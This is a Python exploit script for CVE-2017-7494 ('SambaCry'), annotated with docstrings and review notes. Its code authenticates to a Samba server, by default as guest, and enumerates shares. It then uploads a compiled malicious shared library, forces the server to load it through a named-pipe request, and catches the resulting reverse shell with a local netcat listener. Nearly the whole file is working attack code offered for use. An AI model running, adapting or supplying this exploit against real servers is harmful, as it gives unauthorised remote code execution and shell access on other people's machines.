#!/usr/bin/python
# -*- coding: utf-8 -*-
# CVE-2017-7494
# Exploit Title: Samba 4.5.9, 3.5, 3.6 Unauthenticated Remote Code Execution
# Note: "unauthenticated" holds only when the target exposes a share that is writable
# over an anonymous/guest session (user and password default to ""); otherwise supply
# -u/-P or --hashes. The script also needs the share's server-side path as returned by
# srvsvc NetrShareEnum, because that path is what the vulnerable server is asked to load.
# (m4ud)
from impacket.smbconnection import SMBConnection
from impacket.dcerpc.v5 import transport, srvs
import random
from optparse import OptionParser
import re
import os
from time import sleep
import emoji
from pyfiglet import Figlet
import subprocess
# Banner rendered with pyfiglet; `print(x)` with a single argument behaves the same on
# Python 2 (parenthesised expression) and Python 3.
f = Figlet(font='slant')
print(f.renderText('noSAMBAnoCRY'))
#print """
# _____ ___ __ _______ ___ ____________ __
# ____ ____ / ___// | / |/ / __ )/ | ____ ____ / ____/ __ \ \/ /
# / __ \/ __ \\__ \/ /| | / /|_/ / __ / /| | / __ \/ __ \/ / / /_/ /\ /
# / / / / /_/ /__/ / ___ |/ / / / /_/ / ___ |/ / / / /_/ / /___/ _, _/ / /
#/_/ /_/\____/____/_/ |_/_/ /_/_____/_/ |_/_/ /_/\____/\____/_/ |_| /_/
#"""
# Template for the config.h that `make` consumes when building the payload library.
# Substitution order (see SmbExploder.get_lib): lport, lhost, shell binary, old-entrypoint flag.
CONFIG_H = (
    "#define SHELL_PORT %s\n"
    '#define SHELL_HOST "%s"\n'
    '#define SHELL_BINARY "%s"\n'
    "#define USE_OLD_ENTRYPOINT %s\n"
)
# NetBIOS name passed to impacket's SMBConnection / SMBTransport.
rName = '*SMBSERVER'
# Payload library used when neither -a (arch) nor -c (custom .so) is given.
lib_name = "evilLibx64.so"
class SmbExploder:
    """Driver for the CVE-2017-7494 (Samba is_known_pipename) shared-object load.

    Flow, as wired in start_exp(): obtain the payload .so (get_lib), authenticate over SMB
    and enumerate shares with srvsvc NetrShareEnum, upload the .so to the enumerated
    shares (copy_lib), then open a named pipe whose name is the .so's server-side path
    (load_exp). Per the CVE, a vulnerable Samba treats that pipe name as a filesystem path
    and loads it as a module; a local `nc` listener is spawned to receive the payload's
    reverse shell.

    All configuration comes from the OptionParser built in main(); option names below
    (rhost, rport, lhost, lport, user, pwd, hashes, shell, cBin, arch, old) match its dests.
    NOTE(review): the listing this was recovered from had its indentation stripped; the
    block structure below is reconstructed from data flow (sPath/module are only defined
    inside the share loop) and should be confirmed against the upstream file.
    """
    def __init__(self, options):
        """Copy parsed options onto the instance and normalise the credential fields.

        user/pwd default to "" (anonymous/guest login). hashes must be "LMHASH:NTHASH";
        any other shape makes the split() below raise ValueError - there is no check.
        The SMBConnection created here is never used: login() builds a fresh one (it
        presumably still opens a TCP session to rhost at construction time - confirm).
        """
        self.rhost = options.rhost
        self.rport = options.rport
        self.lhost = options.lhost
        self.lport = options.lport
        self.user = options.user
        self.hashes = options.hashes
        self.smb = SMBConnection(rName, self.rhost, sess_port=int(self.rport))
        self.shell = options.shell
        self.cBin = options.cBin
        self.arch = options.arch
        # -o has no default in main(), so this is None unless given; get_lib() writes it
        # verbatim into config.h and load_exp() compares it against the string "1".
        self.old = options.old
        if self.user is None:
            self.user = ""
        self.pwd = options.pwd
        if self.pwd is None:
            self.pwd = ""
        if self.hashes is not None:
            self.lmhash, self.nthash = options.hashes.split(':')
        else:
            self.lmhash = ''
            self.nthash = ''
    def SMBpath(self, path):
        """Turn a share path from NetrShareEnum into a POSIX-style path.

        Drops everything up to and including the first ':' (a drive-letter prefix) and
        converts backslashes to '/'. Only the first ':' is consulted, so a path that has
        no drive prefix but contains ':' elsewhere is truncated.
        """
        pos = path.find(":")
        if pos > -1:
            path = path[pos+1:]
        path = path.replace("\\", "/")
        return path
    def libsArch(self, sPath, lib_name):
        """Return the .so's server-side path and open the local .so for upload.

        Side effects: sets self.execName (basename, used as the remote file name) and
        self.execFile (open handle whose .read is handed to putFile). The handle is never
        closed, and this is called once per enumerated share, so handles accumulate.
        NOTE(review): if lib_name carries a directory component (possible via -c), the
        remote name is its basename but `module` keeps the full relative path, so the
        path passed to load_exp() will not match the uploaded file.
        """
        module = sPath + "/" + lib_name
        self.execName = os.path.basename(lib_name)
        self.execFile = open(lib_name, 'rb')
        return module
    def get_lib(self):
        """Make a payload library available; return True when one is ready.

        With -c (custom .so) nothing is built - but only when the name is longer than one
        character (`len(...) > 1`, presumably meant as `if self.cBin`). Otherwise config.h
        is written from CONFIG_H and `make` is run in the current working directory, so
        the Makefile and sources must sit in the CWD, not necessarily next to this script.
        Returns make's success (exit status 0); start_exp() ignores this value.
        """
        if (len(self.cBin) > 1) == 1:
            print "[ ! ] Using Custom binary, hope payload works. [ ! ]"
            return True
        # "wb" with a str body is Python 2 only; self.old is None when -o is absent and is
        # substituted verbatim ("#define USE_OLD_ENTRYPOINT None").
        with open("config.h", "wb") as f:
            f.write(CONFIG_H % (self.lport, self.lhost, self.shell, self.old))
        print "[ + ] Compiling evil lib... [ + ]"
        ret = os.system("make")
        return ret == 0
    def login(self):
        """Open a new SMB session to rhost:rport and authenticate.

        Uses the password when given, otherwise the LM/NT hashes (both "" for anonymous).
        Raises impacket's SessionError on authentication failure - not caught here.
        """
        self.smb = SMBConnection(rName, self.rhost, sess_port=int(self.rport))
        self.smb.login(user=self.user, password=self.pwd, lmhash=self.lmhash, nthash=self.nthash)
    def copy_lib(self, lib_name):
        """Enumerate shares over srvsvc and upload the payload .so to them.

        lib_name: default library name; overridden by -a (arch) or -c (custom .so).
        Returns the server-side path of the library for the share processed last
        (assumed to be after the loop, see class note). Failures are not handled: a
        putFile to a share the session cannot write to raises and aborts the whole run.
        NOTE(review): the IPC$ filter on the first `j = ...` line is immediately
        overwritten by the print$ filter, so IPC$ is not skipped; print$ is.
        """
        self.login()
        rpctransport = transport.SMBTransport(rName, self.rhost, filename=r'\srvsvc', smb_connection=self.smb)
        dce = rpctransport.get_dce_rpc()
        dce.connect()
        dce.bind(srvs.MSRPC_UUID_SRVS)
        # Level 2 carries shi2_path, the server-side directory backing each share.
        resp = srvs.hNetrShareEnum(dce, 2)
        for share in resp['InfoStruct']['ShareInfo']['Level2']['Buffer']:
            # [:-1] strips the trailing NUL of the wire strings.
            sName = share['shi2_netname'][:-1]
            sPath = self.SMBpath(share['shi2_path'][:-1])
            # Round-trip through "name:path" - a no-op unless the name contains ':'.
            k = str(sName) +":"+ str(sPath)
            sName, sPath = k.split(':')
            j = sName.replace('IPC$', '')
            j = sName.replace('print$', '')
            j = str(j)
            # sName is a single line, so `shares` is either sName or "" (for print$).
            shares = "".join([s for s in j.splitlines(True) if s.strip("\r\n")])
            if self.arch == "1":
                lib_name = "evilLibx86.so"
                module = self.libsArch(sPath, lib_name)
            elif self.arch == "2":
                lib_name = "evilLibi686.so"
                module = self.libsArch(sPath, lib_name)
            # -c wins over -a; each branch re-opens the .so (see libsArch).
            if not self.cBin:
                lib_name = lib_name
                module = self.libsArch(sPath, lib_name)
            else:
                lib_name = self.cBin
                module = self.libsArch(sPath, lib_name)
            # shares = os.linesep.join([s for s in j.splitlines() if s])
            # Runs at most once per share (see `shares` above).
            for sharez in shares.splitlines():
                print "[ + ] Using %s [ + ]" % lib_name
                print "[ + ] Copying lib '%s' to share '%s' [ + ]" % (lib_name, sharez)
                self.smb.putFile(sharez, self.execName, self.execFile.read)
        return module
    def load_exp(self):
        """Upload the library, start the local listener and trigger the module load.

        With -o 1 the path is prefixed with `\\PIPE\` (what the non-raw literal evaluates
        to) for the older entry point. Spawns `nc -lvnp <lport>` - requires an nc on PATH
        that accepts these flags - then opens the named pipe whose name is the .so path;
        dce.connect() is the trigger and will typically fail/raise once the payload runs.
        Blocks in f.communicate() until the nc listener exits.
        """
        module = self.copy_lib(lib_name)
        if self.old == "1":
            module = '\\\PIPE\\' + module
        print "module: %s" % module
        print "[ " + emoji.emojize(':skull:') + " ] Loading evil module [ " +emoji.emojize(':skull:') +" ]"
        f = subprocess.Popen(["nc", "-lvnp", str(self.lport)])
        # The string binding is only used to extract the network address, which is
        # expected to be just self.rhost; the pipe name is passed separately as filename.
        stringbinding = r'ncacn_np:%s[\pipe\%s]'% (self.rhost, module)
        stb = transport.DCERPCStringBinding(stringbinding)
        naddr = stb.get_network_address()
        rpctransport = transport.SMBTransport(naddr, filename = module, smb_connection = self.smb)
        dce = rpctransport.get_dce_rpc()
        dce.connect()
        f.communicate()
    def start_exp(self):
        """Run the full chain: build/select the .so, then upload and load it.

        get_lib()'s result is ignored, so load_exp() runs even if `make` failed.
        Returns None, which is why main()'s `if exp.start_exp():` never prints.
        """
        self.get_lib()
        self.load_exp()
def _build_parser():
    """Return the OptionParser for the command line, one entry per flag.

    Specs are (flags, dest, default, help); a default of None means the option has no
    default and the dest is None when the flag is absent.
    """
    parser = OptionParser()
    specs = [
        (("-r", "--rhost"), "rhost", None, "target ip address"),
        (("-p", "--rport"), "rport", 445, "target port"),
        (("--lhost",), "lhost", None, "LHOST IP Reverse shell!"),
        (("--lport",), "lport", 60312, "LPORT for Reverse shell!"),
        (("-u", "--user"), "user", None, "Username"),
        (("-P", "--pwd"), "pwd", None, "Pwd"),
        (("--hashes",), "hashes", None, "Hashes NTLM"),
        (("-s", "--shell"), "shell", "/bin/sh", "Shell to use (by default /bin/sh)"),
        (("-c", "--cbin"), "cBin", "", "To run a custom .so"),
        (("-a", "--arch"), "arch", None, "Choose reverse Shell arch, 1 = x32 and 2 = i686 (Default is x86_64)"),
        (("-o", "--old"), "old", None, "For Samba 3.5"),
    ]
    for flags, dest, default, help_text in specs:
        kwargs = {"dest": dest, "help": help_text}
        if default is not None:
            kwargs["default"] = default
        parser.add_option(*flags, **kwargs)
    return parser


def main():
    """Parse the command line and drive SmbExploder; print usage when -r is missing.

    NOTE(review): SmbExploder.start_exp() has no return statement, so the success
    message below is never printed.
    """
    parser = _build_parser()
    options, _args = parser.parse_args()
    if not options.rhost:
        parser.print_help()
        return
    exp = SmbExploder(options)
    if exp.start_exp():
        print("Some many questions, did it work out???")
# Script entry point; nothing runs on import.
if __name__ == "__main__":
    main()